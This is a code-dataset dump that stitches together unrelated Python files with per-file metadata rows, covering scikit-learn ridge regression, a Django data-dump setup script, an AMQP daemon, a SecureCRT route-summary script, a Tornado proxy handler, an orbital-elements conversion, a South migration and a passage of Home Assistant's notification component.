This class is not intended to be used directly. Use RidgeCV instead.
Notes
-----
We want to solve (K + alpha*Id)c = y,
where K = X X^T is the kernel matrix.
Let G = (K + alpha*Id)^-1.
Dual solution: c = Gy
Primal solution: w = X^T c
Compute eigendecomposition K = Q V Q^T.
Then G = Q (V + alpha*Id)^-1 Q^T,
where (V + alpha*Id) is diagonal.
It is thus inexpensive to inverse for many alphas.
Let loov be the vector of prediction values for each example
when the model was fitted with all examples but this example.
loov = (KGY - diag(KG)Y) / diag(I-KG)
Let looe be the vector of prediction errors for each example
when the model was fitted with all examples but this example.
looe = y - loov = c / diag(G)
**References**:
http://cbcl.mit.edu/projects/cbcl/publications/ps/MIT-CSAIL-TR-2007-025.pdf
http://www.mit.edu/~9.520/spring07/Classes/rlsslides.pdf
"""
def __init__(self, alphas=[0.1, 1.0, 10.0], fit_intercept=True,
normalize=False, score_func=None, loss_func=None, copy_X=True):
self.alphas = np.asarray(alphas)
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.copy_X = copy_X
def _pre_compute(self, X, y):
# even if X is very sparse, K is usually very dense
K = safe_sparse_dot(X, X.T, dense_output=True)
from scipy import linalg
v, Q = linalg.eigh(K)
return K, v, Q
def _errors(self, v, Q, y, alpha):
G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
G_diag = np.diag(G)
# handle case when y is 2-d
G_diag = G_diag if len(y.shape) == 1 else G_diag[:, np.newaxis]
return (c / G_diag) ** 2, c
def _values(self, K, v, Q, y, alpha):
n_samples = y.shape[0]
G = np.dot(np.dot(Q, np.diag(1.0 / (v + alpha))), Q.T)
c = np.dot(G, y)
KG = np.dot(K, G)
#KG = np.dot(np.dot(Q, np.diag(v / (v + alpha))), Q.T)
KG_diag = np.diag(KG)
denom = np.ones(n_samples) - KG_diag
if len(y.shape) == 2:
# handle case when y is 2-d
KG_diag = KG_diag[:, np.newaxis]
denom = denom[:, np.newaxis]
num = np.dot(KG, y) - KG_diag * y
return num / denom, c
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : {array-like, sparse matrix}, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
X = safe_asarray(X, dtype=np.float)
y = np.asarray(y, dtype=np.float)
n_samples = X.shape[0]
X, y, X_mean, y_mean, X_std = LinearModel._center_data(X, y,
self.fit_intercept, self.normalize, self.copy_X)
K, v, Q = self._pre_compute(X, y)
n_y = 1 if len(y.shape) == 1 else y.shape[1]
M = np.zeros((n_samples * n_y, len(self.alphas)))
C = []
error = self.score_func is None and self.loss_func is None
for i, alpha in enumerate(self.alphas):
if error:
out, c = self._errors(v, Q, y, sample_weight * alpha)
else:
out, c = self._values(K, v, Q, y, sample_weight * alpha)
M[:, i] = out.ravel()
C.append(c)
if error:
best = M.mean(axis=0).argmin()
else:
func = self.score_func if self.score_func else self.loss_func
out = [func(y.ravel(), M[:, i]) for i in range(len(self.alphas))]
best = np.argmax(out) if self.score_func else np.argmin(out)
self.best_alpha = self.alphas[best]
self.dual_coef_ = C[best]
self.coef_ = safe_sparse_dot(self.dual_coef_.T, X)
self._set_intercept(X_mean, y_mean, X_std)
return self
class RidgeCV(LinearModel):
"""Ridge regression with built-in cross-validation.
By default, it performs Generalized Cross-Validation, which is a form of
efficient Leave-One-Out cross-validation. Currently, only the n_features >
n_samples case is handled efficiently.
Parameters
----------
alphas: numpy array of shape [n_alpha]
Array of alpha values to try.
Small positive values of alpha improve the conditioning of the
problem and reduce the variance of the estimates.
Alpha corresponds to (2*C)^-1 in other linear models such as
LogisticRegression or LinearSVC.
fit_intercept : boolean
Whether to calculate the intercept for this model. If set
to false, no intercept will be used in calculations
(e.g. data is expected to be already centered).
normalize : boolean, optional
If True, the regressors X are normalized
score_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediciton (big is good)
if None is passed, the score of the estimator is maximized
loss_func: callable, optional
function that takes 2 arguments and compares them in
order to evaluate the performance of prediciton (small is good)
if None is passed, the score of the estimator is maximized
cv : cross-validation generator, optional
If None, Generalized Cross-Validationn (efficient Leave-One-Out)
will be used.
See also
--------
Ridge, RidgeClassifierCV
"""
def __init__(self, alphas=np.array([0.1, 1.0, 10.0]), fit_intercept=True,
normalize=False, score_func=None, loss_func=None, cv=None):
self.alphas = alphas
self.fit_intercept = fit_intercept
self.normalize = normalize
self.score_func = score_func
self.loss_func = loss_func
self.cv = cv
def fit(self, X, y, sample_weight=1.0):
"""Fit Ridge regression model
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training data
y : array-like, shape = [n_samples] or [n_samples, n_responses]
Target values
sample_weight : float or array-like of shape [n_samples]
Sample weight
Returns
-------
self : Returns self.
"""
if self.cv is None:
estimator = _RidgeGCV(self.alphas, self.fit_intercept,
self.score_func, self.loss_func)
estimator.fit(X, y, sample_weight=sample_weight)
self.best_alpha = estimator.best_alpha
else:
parameters = {'alpha': self.alphas}
# FIXME: sample_weight must be split into training/validation data
# too!
#fit_params = {'sample_weight' : sample_weight}
fit_params = {}
gs = GridSearchCV(Ridge(fit_intercept=self.fit_intercept),
parameters, fit_params=fit_params, cv=self.cv)
gs.fit(X, y)
estimator = gs.best_estimator_
self.best_alpha = gs.best_estimator_.alpha
self.coef_ = estimator.coef_
self.intercept_ = estimator.intercept_
return self
class RidgeClassifierCV(RidgeCV):
def fit(self, X, y, sample_weight=1.0, class_weight=None):
"""Fit the ridge classifier.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Training vectors, where n_samples is the number of samples
and n_features is the number of features.
y : array-like, shape = [n_samples]
Target values.
sample_weight : float or numpy array of shape [n_samples]
Sample weight
class_weight : dict, optional
Weights associated with classes in the form
{class_label : weight}. If not given, all classes are
supposed to have weight one.
Returns
-------
self : object
Returns self.
"""
if class_weight is None:
class_weight = {}
sample_weight2 = np.array([class_weight.get(k, 1.0) for k in y])
self.label_binarizer = LabelBinarizer()
Y = self.label_binarizer.fit_transform(y)
RidgeCV.fit(self, X, Y,
sample_weight=sample_weight * sample_weight2)
return self
def decision_function(self, X):
return RidgeCV.decision_function(self, X)
def predict(self, X):
"""Predict target values according to the fitted model.
Parameters
----------
X : array-like, shape = [n_samples, n_features]
Returns
-------
y : array, shape = [n_samples]
"""
Y = self.decision_function(X)
return self.label_binarizer.inverse_transform(Y)
|
bsd-3-clause
| -420,045,437,906,127,550
| 31.157983
| 79
| 0.580799
| false
| 3.860775
| false
| false
| false
|
davidvicenteranz/drf-api-dump
|
setup.py
|
1
|
1451
|
# -*- coding: utf-8 -*-
from setuptools import setup
DESCRIPTION = """
This Django app is intended for **dump data from apps or models via HTTP**. Basically exposes
dumdata command to http.
Features:
- Just accesible by superusers
- Ability to include or exclude any specific app or model
Requirements:
- Django (Developed under v1.11)
- Django Rest Framework (Developed under v3.4.3)
More on https://github.com/davidvicenteranz/drf-api-dump/
"""
setup(
name='drf-api-dump',
version='0.1.3',
author='David Vicente Ranz',
author_email='dvicente74@gmail.com',
include_package_data=True,
packages=[
'drf_api_dump'
],
url='https://github.com/davidvicenteranz/drf-api-dump/',
license='MIT license',
description='Dumps data from apps or models via HTTP',
long_description=DESCRIPTION,
install_requires=[
'djangorestframework'
],
keywords='django dumpdata development',
classifiers=(
'Framework :: Django',
'Development Status :: 4 - Beta',
'Environment :: Web Environment',
'Intended Audience :: Developers',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Topic :: Software Development :: Libraries :: Python Modules'
),
)
|
mit
| -2,079,235,607,391,890,700
| 27.470588
| 93
| 0.641626
| false
| 3.89008
| false
| false
| false
|
edeposit/edeposit.amqp
|
bin/edeposit_amqp_ltpd.py
|
1
|
2504
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
#
# Interpreter version: python 2.7
#
# Imports =====================================================================
"""
AMQP binding for LTP exporter. See `edeposit.amqp.ltp
<https://github.com/edeposit/edeposit.amqp.ltp>`_ for details.
"""
import os
import sys
import os.path
import argparse
from pika.exceptions import ConnectionClosed
from edeposit.amqp.ltp import *
# if the amqp module wasn't yet installed at this system, load it from package
try:
from edeposit.amqp import settings
except ImportError:
sys.path.insert(0, os.path.abspath('../edeposit/'))
import amqp
sys.modules["edeposit.amqp"] = amqp
from edeposit.amqp.amqpdaemon import AMQPDaemon, getConParams
from edeposit.amqp import settings
# Functions & objects =========================================================
def main(args, stop=False):
"""
Arguments parsing, etc..
"""
daemon = AMQPDaemon(
con_param=getConParams(
settings.RABBITMQ_LTP_VIRTUALHOST
),
queue=settings.RABBITMQ_LTP_INPUT_QUEUE,
out_exch=settings.RABBITMQ_LTP_EXCHANGE,
out_key=settings.RABBITMQ_LTP_OUTPUT_KEY,
react_fn=reactToAMQPMessage,
glob=globals() # used in deserializer
)
if not stop and args.foreground: # run at foreground
daemon.run()
else:
daemon.run_daemon() # run as daemon
# Main program ================================================================
if __name__ == '__main__':
if len(sys.argv) > 1 and sys.argv[1] == "stop":
main(None, stop=True)
sys.exit(0)
parser = argparse.ArgumentParser(
usage='%(prog)s start/stop/restart [-f/--foreground]',
description="""AMQP daemon for LTP exporter."""
)
parser.add_argument(
"action",
metavar="start/stop/restart",
type=str,
default=None,
help="Start/stop/restart the daemon."
)
parser.add_argument(
"-f",
'--foreground',
action="store_true",
required=False,
help="""Run at foreground, not as daemon. If not set, script is will
run at background as unix daemon."""
)
args = parser.parse_args()
try:
main(args)
except ConnectionClosed as e:
sys.stderr.write(
e.message + " - is the RabbitMQ queues properly set?\n"
)
sys.exit(1)
except KeyboardInterrupt:
pass
|
gpl-2.0
| 4,022,404,615,706,803,700
| 26.217391
| 79
| 0.567492
| false
| 3.793939
| false
| false
| false
|
garibaldi0/SecureCRT
|
s_nexthop_summary.py
|
1
|
13227
|
# $language = "python"
# $interface = "1.0"
import os
import sys
import logging
# Add script directory to the PYTHONPATH so we can import our modules (only if run from SecureCRT)
if 'crt' in globals():
script_dir, script_name = os.path.split(crt.ScriptFullName)
if script_dir not in sys.path:
sys.path.insert(0, script_dir)
else:
script_dir, script_name = os.path.split(os.path.realpath(__file__))
# Now we can import our custom modules
from securecrt_tools import scripts
from securecrt_tools import utilities
from securecrt_tools import ipaddress
# Create global logger so we can write debug messages from any function (if debug mode setting is enabled in settings).
logger = logging.getLogger("securecrt")
logger.debug("Starting execution of {0}".format(script_name))
# ################################################ SCRIPT LOGIC ###################################################
def script_main(session, ask_vrf=True, vrf=None):
"""
| SINGLE device script
| Author: Jamie Caesar
| Email: jcaesar@presidio.com
This script will grab the route table information from a Cisco IOS or NXOS device and export details about each
next-hop address (how many routes and from which protocol) into a CSV file. It will also list all connected
networks and give a detailed breakdown of every route that goes to each next-hop.
:param session: A subclass of the sessions.Session object that represents this particular script session (either
SecureCRTSession or DirectSession)
:type session: sessions.Session
:param ask_vrf: A boolean that specifies if we should prompt for which VRF. The default is true, but when this
module is called from other scripts, we may want avoid prompting and supply the VRF with the "vrf" input.
:type ask_vrf: bool
:param vrf: The VRF that we should get the route table from. This is used only when ask_vrf is False.
:type vrf: str
"""
# Get script object that owns this session, so we can check settings, get textfsm templates, etc
script = session.script
# Start session with device, i.e. modify term parameters for better interaction (assuming already connected)
session.start_cisco_session()
# Validate device is running a supported OS
session.validate_os(["IOS", "NXOS"])
# If we should prompt for a VRF, then do so. Otherwise use the VRF passed into the function (if any)
if ask_vrf:
selected_vrf = script.prompt_window("Enter the VRF name. (Leave blank for default VRF)")
else:
selected_vrf = vrf
# If we have a VRF, modify our commands and hostname to reflect it. If not, pull the default route table.
if selected_vrf:
send_cmd = "show ip route vrf {0}".format(selected_vrf)
session.hostname = session.hostname + "-VRF-{0}".format(selected_vrf)
logger.debug("Received VRF: {0}".format(selected_vrf))
else:
send_cmd = "show ip route"
raw_routes = session.get_command_output(send_cmd)
if session.os == "IOS":
template_file = script.get_template("cisco_ios_show_ip_route.template")
else:
template_file = script.get_template("cisco_nxos_show_ip_route.template")
fsm_results = utilities.textfsm_parse_to_dict(raw_routes, template_file)
route_list = parse_routes(fsm_results)
output_filename = session.create_output_filename("nexthop-summary", ext=".csv")
output = nexthop_summary(route_list)
utilities.list_of_lists_to_csv(output, output_filename)
# Return terminal parameters back to the original state.
session.end_cisco_session()
def update_empty_interfaces(route_table):
"""
Takes the routes table as a list of dictionaries (with dict key names used in parse_routes function) and does
recursive lookups to find the outgoing interface for those entries in the route-table where the outgoing interface
isn't listed.
:param route_table: Route table information as a list of dictionaries (output from TextFSM)
:type route_table: list of dict
:return: The updated route_table object with outbound interfaces filled in.
:rtype: list of dict
"""
def recursive_lookup(nexthop):
"""
Recursively looks up a route to find the actual next-hop on a connected network.
:param nexthop: The next-hop IP that we are looking for
:type nexthop: securecrt_tools.ipaddress
:return: The directly connected next-hop for the input network.
:rtype: securecrt_tools.ipaddress
"""
for network in connected:
if nexthop in network:
return connected[network]
for network in statics:
if nexthop in network:
return recursive_lookup(statics[network])
return None
logger.debug("STARTING update_empty_interfaces")
connected = {}
unknowns = {}
statics = {}
for route in route_table:
if route['protocol'] == 'connected':
connected[route['network']] = route['interface']
if route['protocol'] == 'static':
if route['nexthop']:
statics[route['network']] = route['nexthop']
if route['nexthop'] and not route['interface']:
unknowns[route['nexthop']] = None
for nexthop in unknowns:
unknowns[nexthop] = recursive_lookup(nexthop)
for route in route_table:
if not route['interface']:
if route['nexthop'] in unknowns:
route['interface'] = unknowns[route['nexthop']]
logger.debug("ENDING update_empty_interfaces")
def parse_routes(fsm_routes):
"""
This function will take the TextFSM parsed route-table from the `textfsm_parse_to_dict` function. Each dictionary
in the TextFSM output represents a route entry. Each of these dictionaries will be updated to convert IP addresses
into ip_address or ip_network objects (from the ipaddress.py module). Some key names will also be updated also.
:param fsm_routes: TextFSM output from the `textfsm_parse_to_dict` function.
:type fsm_routes: list of dict
:return: An updated list of dictionaries that replaces IP address strings with objects from the ipaddress.py module
:rtype: list of dict
"""
logger.debug("STARTING parse_routes function.")
complete_table = []
for route in fsm_routes:
new_entry = {}
logger.debug("Processing route entry: {0}".format(str(route)))
new_entry['network'] = ipaddress.ip_network(u"{0}/{1}".format(route['NETWORK'], route['MASK']))
new_entry['protocol'] = utilities.normalize_protocol(route['PROTOCOL'])
if route['NEXTHOP_IP'] == '':
new_entry['nexthop'] = None
else:
new_entry['nexthop'] = ipaddress.ip_address(unicode(route['NEXTHOP_IP']))
if route["NEXTHOP_IF"] == '':
new_entry['interface'] = None
else:
new_entry['interface'] = route['NEXTHOP_IF']
# Nexthop VRF will only occur in NX-OS route tables (%vrf-name after the nexthop)
if 'NEXTHOP_VRF' in route:
if route['NEXTHOP_VRF'] == '':
new_entry['vrf'] = None
else:
new_entry['vrf'] = route['NEXTHOP_VRF']
logger.debug("Adding updated route entry '{0}' based on the information: {1}".format(str(new_entry),
str(route)))
complete_table.append(new_entry)
update_empty_interfaces(complete_table)
logger.debug("ENDING parse_route function")
return complete_table
def nexthop_summary(textfsm_dict):
"""
A function that builds a CSV output (list of lists) that displays the summary information after analyzing the
input route table.
:param textfsm_dict: The route table information in list of dictionaries format.
:type textfsm_dict: list of dict
:return: The nexthop summary information in a format that can be easily written to a CSV file.
:rtype: list of lists
"""
# Identify connected or other local networks -- most found in NXOS to exlude from next-hops. These are excluded
# from the nexthop summary (except connected has its own section in the output).
logger.debug("STARTING nexthop_summary function")
local_protos = ['connected', 'local', 'hsrp', 'vrrp', 'glbp']
# Create a list of all dynamic protocols from the provided route table. Add total and statics to the front.
proto_list = []
for entry in textfsm_dict:
if entry['protocol'] not in proto_list and entry['protocol'] not in local_protos:
logger.debug("Found protocol '{0}' in the table".format(entry['protocol']))
proto_list.append(entry['protocol'])
proto_list.sort(key=utilities.human_sort_key)
proto_list.insert(0, 'total')
proto_list.insert(0, 'interface')
# Create dictionaries to store summary information as we process the route table.
summary_table = {}
connected_table = {}
detailed_table = {}
# Process the route table to populate the above 3 dictionaries.
for entry in textfsm_dict:
logger.debug("Processing route: {0}".format(str(entry)))
# If the route is connected, local or an FHRP entry
if entry['protocol'] in local_protos:
if entry['protocol'] == 'connected':
if entry['interface'] not in connected_table:
connected_table[entry['interface']] = []
connected_table[entry['interface']].append(str(entry['network']))
else:
if entry['nexthop']:
if 'vrf' in entry and entry['vrf']:
nexthop = "{0}%{1}".format(entry['nexthop'], entry['vrf'])
else:
nexthop = str(entry['nexthop'])
elif entry['interface'].lower() == "null0":
nexthop = 'discard'
if nexthop not in summary_table:
# Create an entry for this next-hop, containing zero count for all protocols.
summary_table[nexthop] = {}
summary_table[nexthop].update(zip(proto_list, [0] * len(proto_list)))
summary_table[nexthop]['interface'] = entry['interface']
# Increment total and protocol specific count
summary_table[nexthop][entry['protocol']] += 1
summary_table[nexthop]['total'] += 1
if nexthop not in detailed_table:
detailed_table[nexthop] = []
detailed_table[nexthop].append((str(entry['network']), entry['protocol']))
# Convert summary_table into a format that can be printed to the CSV file.
output = []
header = ["Nexthop", "Interface", "Total"]
header.extend(proto_list[2:])
output.append(header)
summary_keys = sorted(summary_table.keys(), key=utilities.human_sort_key)
for key in summary_keys:
line = [key]
for column in proto_list:
line.append(summary_table[key][column])
output.append(line)
output.append([])
# Convert the connected_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Connected:"])
output.append(["Interface", "Network(s)"])
connected_keys = sorted(connected_table.keys(), key=utilities.human_sort_key)
for key in connected_keys:
line = [key]
for network in connected_table[key]:
line.append(network)
output.append(line)
output.append([])
# Convert the detailed_table into a format that can be printed to the CSV file (and append to output)
output.append([])
output.append(["Route Details"])
output.append(["Nexthop", "Network", "Protocol"])
detailed_keys = sorted(detailed_table.keys(), key=utilities.human_sort_key)
for key in detailed_keys:
for network in detailed_table[key]:
line = [key]
line.extend(list(network))
output.append(line)
output.append([])
# Return the output, ready to be sent to directly to a CSV file
logger.debug("ENDING nexthop_summary function")
return output
# ################################################ SCRIPT LAUNCH ###################################################
# If this script is run from SecureCRT directly, use the SecureCRT specific class
if __name__ == "__builtin__":
# Initialize script object
crt_script = scripts.CRTScript(crt)
# Get session object for the SecureCRT tab that the script was launched from.
crt_session = crt_script.get_main_session()
# Run script's main logic against our session
script_main(crt_session)
# Shutdown logging after
logging.shutdown()
# If the script is being run directly, use the simulation class
elif __name__ == "__main__":
# Initialize script object
direct_script = scripts.DebugScript(os.path.realpath(__file__))
# Get a simulated session object to pass into the script.
sim_session = direct_script.get_main_session()
# Run script's main logic against our session
script_main(sim_session)
# Shutdown logging after
logging.shutdown()
|
apache-2.0
| -3,942,150,797,001,814,000
| 40.46395
| 119
| 0.641113
| false
| 4.120561
| false
| false
| false
|
alejandrobernardis/python-slot-machines
|
src/backend/backend/api/public/services.py
|
1
|
3062
|
#!/usr/bin/env python2.7
# -*- coding: utf-8 -*-
# Copyright (c) 2014 Asumi Kamikaze Inc.
# Licensed under the MIT License.
# Author: Alejandro M. Bernardis
# Email: alejandro (dot) bernardis (at) asumikamikaze (dot) com
# Created: 02/Oct/2014 2:46 PM
from backend.api.base import BaseHandler
from tornado import gen
from tornado.httpclient import AsyncHTTPClient, HTTPRequest
class ServiceHandler(BaseHandler):
def _get_url(self, with_domain=True):
url = '/s' + self.request.uri
if with_domain:
url = self.api_domain('http') + url
return url
@gen.coroutine
def _set_request(self):
response = None
try:
request = HTTPRequest(self._get_url())
request.method = self.request.method
request.headers = self.request.headers
if self.request.method in ("POST", "DELETE", "PATCH", "PUT"):
request.body = self.request.body
response = yield AsyncHTTPClient().fetch(request)
self.write(response.body)
except Exception, e:
self.get_json_exception_response_and_finish(e)
raise gen.Return(response)
def prepare(self):
self.set_header_for_json()
def compute_etag(self):
return None
@gen.coroutine
def head(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def get(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def post(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def delete(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def patch(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def put(self, *args, **kwargs):
yield self._set_request()
@gen.coroutine
def options(self, *args, **kwargs):
yield self._set_request()
handlers_list = [
(r'/sign/in(?P<uid>\/[a-z0-9]+)?/?', ServiceHandler),
(r'/sign/out/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/find_golden_eggs/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/roulette/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/game/slot/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/android/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/store/ios/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/media/nags/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/sync/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/request/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/gift/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/invite/send/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/notifications/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/social/share/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/balance/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/bonus/(?P<sid>[a-z0-9]+)/?', ServiceHandler),
(r'/session/slots/(?P<sid>[a-z0-9]+)/?', ServiceHandler)
]
|
mit
| -3,224,450,806,062,539,300
| 33.022222
| 73
| 0.59177
| false
| 3.176349
| false
| false
| false
|
lasr/orbital_elements
|
convert/meeEl_meefl.py
|
1
|
1858
|
import numpy as np
__author__ = "Nathan I. Budd"
__email__ = "nibudd@gmail.com"
__copyright__ = "Copyright 2017, LASR Lab"
__license__ = "MIT"
__version__ = "0.1"
__status__ = "Production"
__date__ = "08 Mar 2017"
def meeEl_meefl(meefl):
"""Convert MEEs with true longitude to eccentric longitude.
Args:
meefl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, fl), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
fl = true longitude
Returns:
meeEl: ndarray
(m, 6) array of modified equinoctial elements ordered as
(p, f, g, h, k, El), where
p = semi-latus rectum
f = 1-component of eccentricity vector in perifocal frame
g = 2-component of eccentricity vector in perifocal frame
h = 1-component of the ascending node vector in equinoctial frame
k = 2-component of the ascending node vector in equinoctial frame
El = eccentric longitude
"""
f = meefl[:, 1:2]
g = meefl[:, 2:3]
fl = meefl[:, 5:6]
e = (f**2 + g**2)**.5
B = ((1 + e) / (1 - e))**.5
tan_wbar_by_2 = ((e - f) / (e + f))**0.5
tan_fl_by_2 = np.tan(fl/2)
tan_E_by_2 = 1/B * ((tan_fl_by_2 - tan_wbar_by_2) /
(1 + tan_fl_by_2 * tan_wbar_by_2))
tan_El_by_2 = ((tan_E_by_2 + tan_wbar_by_2) /
(1 - tan_E_by_2 * tan_wbar_by_2))
El = np.mod((2*np.arctan(tan_El_by_2)), 2*np.pi)
return np.concatenate((meefl[:, 0:5], El), axis=1)
|
mit
| 7,915,249,333,846,053,000
| 35.431373
| 77
| 0.55436
| false
| 2.963317
| false
| false
| false
|
beni55/djangolint
|
project/lint/migrations/0002_auto__add_fix.py
|
2
|
2293
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'Fix'
db.create_table('lint_fix', (
('id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('report', self.gf('django.db.models.fields.related.ForeignKey')(related_name='fixes', to=orm['lint.Report'])),
('path', self.gf('django.db.models.fields.CharField')(max_length=255)),
('line', self.gf('django.db.models.fields.PositiveIntegerField')()),
('source', self.gf('django.db.models.fields.TextField')()),
('error', self.gf('django.db.models.fields.TextField')()),
))
db.send_create_signal('lint', ['Fix'])
def backwards(self, orm):
# Deleting model 'Fix'
db.delete_table('lint_fix')
models = {
'lint.fix': {
'Meta': {'object_name': 'Fix'},
'error': ('django.db.models.fields.TextField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'line': ('django.db.models.fields.PositiveIntegerField', [], {}),
'path': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'report': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'fixes'", 'to': "orm['lint.Report']"}),
'source': ('django.db.models.fields.TextField', [], {})
},
'lint.report': {
'Meta': {'ordering': "['-created']", 'object_name': 'Report'},
'created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'error': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hash': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'stage': ('django.db.models.fields.CharField', [], {'default': "'waiting'", 'max_length': '10'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
}
}
complete_apps = ['lint']
|
isc
| 781,272,958,794,556,400
| 44.86
| 130
| 0.549935
| false
| 3.777595
| false
| false
| false
|
fbradyirl/home-assistant
|
homeassistant/components/persistent_notification/__init__.py
|
1
|
6944
|
"""Support for displaying persistent notifications."""
from collections import OrderedDict
import logging
from typing import Awaitable
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.core import HomeAssistant, callback
from homeassistant.exceptions import TemplateError
from homeassistant.helpers import config_validation as cv
from homeassistant.helpers.entity import async_generate_entity_id
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
import homeassistant.util.dt as dt_util
ATTR_CREATED_AT = "created_at"
ATTR_MESSAGE = "message"
ATTR_NOTIFICATION_ID = "notification_id"
ATTR_TITLE = "title"
ATTR_STATUS = "status"
DOMAIN = "persistent_notification"
ENTITY_ID_FORMAT = DOMAIN + ".{}"
EVENT_PERSISTENT_NOTIFICATIONS_UPDATED = "persistent_notifications_updated"
SERVICE_CREATE = "create"
SERVICE_DISMISS = "dismiss"
SERVICE_MARK_READ = "mark_read"
SCHEMA_SERVICE_CREATE = vol.Schema(
{
vol.Required(ATTR_MESSAGE): cv.template,
vol.Optional(ATTR_TITLE): cv.template,
vol.Optional(ATTR_NOTIFICATION_ID): cv.string,
}
)
SCHEMA_SERVICE_DISMISS = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
SCHEMA_SERVICE_MARK_READ = vol.Schema({vol.Required(ATTR_NOTIFICATION_ID): cv.string})
DEFAULT_OBJECT_ID = "notification"
_LOGGER = logging.getLogger(__name__)
STATE = "notifying"
STATUS_UNREAD = "unread"
STATUS_READ = "read"
WS_TYPE_GET_NOTIFICATIONS = "persistent_notification/get"
SCHEMA_WS_GET = websocket_api.BASE_COMMAND_MESSAGE_SCHEMA.extend(
{vol.Required("type"): WS_TYPE_GET_NOTIFICATIONS}
)
@bind_hass
def create(hass, message, title=None, notification_id=None):
"""Generate a notification."""
hass.add_job(async_create, hass, message, title, notification_id)
@bind_hass
def dismiss(hass, notification_id):
"""Remove a notification."""
hass.add_job(async_dismiss, hass, notification_id)
@callback
@bind_hass
def async_create(
hass: HomeAssistant, message: str, title: str = None, notification_id: str = None
) -> None:
"""Generate a notification."""
data = {
key: value
for key, value in [
(ATTR_TITLE, title),
(ATTR_MESSAGE, message),
(ATTR_NOTIFICATION_ID, notification_id),
]
if value is not None
}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_CREATE, data))
@callback
@bind_hass
def async_dismiss(hass: HomeAssistant, notification_id: str) -> None:
"""Remove a notification."""
data = {ATTR_NOTIFICATION_ID: notification_id}
hass.async_create_task(hass.services.async_call(DOMAIN, SERVICE_DISMISS, data))
async def async_setup(hass: HomeAssistant, config: dict) -> Awaitable[bool]:
"""Set up the persistent notification component."""
persistent_notifications = OrderedDict()
hass.data[DOMAIN] = {"notifications": persistent_notifications}
@callback
def create_service(call):
"""Handle a create notification service call."""
title = call.data.get(ATTR_TITLE)
message = call.data.get(ATTR_MESSAGE)
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
if notification_id is not None:
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
else:
entity_id = async_generate_entity_id(
ENTITY_ID_FORMAT, DEFAULT_OBJECT_ID, hass=hass
)
notification_id = entity_id.split(".")[1]
attr = {}
if title is not None:
try:
title.hass = hass
title = title.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering title %s: %s", title, ex)
title = title.template
attr[ATTR_TITLE] = title
try:
message.hass = hass
message = message.async_render()
except TemplateError as ex:
_LOGGER.error("Error rendering message %s: %s", message, ex)
message = message.template
attr[ATTR_MESSAGE] = message
hass.states.async_set(entity_id, STATE, attr)
# Store notification and fire event
# This will eventually replace state machine storage
persistent_notifications[entity_id] = {
ATTR_MESSAGE: message,
ATTR_NOTIFICATION_ID: notification_id,
ATTR_STATUS: STATUS_UNREAD,
ATTR_TITLE: title,
ATTR_CREATED_AT: dt_util.utcnow(),
}
hass.bus.async_fire(EVENT_PERSISTENT_NOTIFICATIONS_UPDATED)
@callback
def dismiss_service(call):
"""Handle the dismiss notification service call."""
notification_id = call.data.get(ATTR_NOTIFICATION_ID)
entity_id = ENTITY_ID_FORMAT.format(slugify(notification_id))
if entity_id not in persistent_notifications:
return
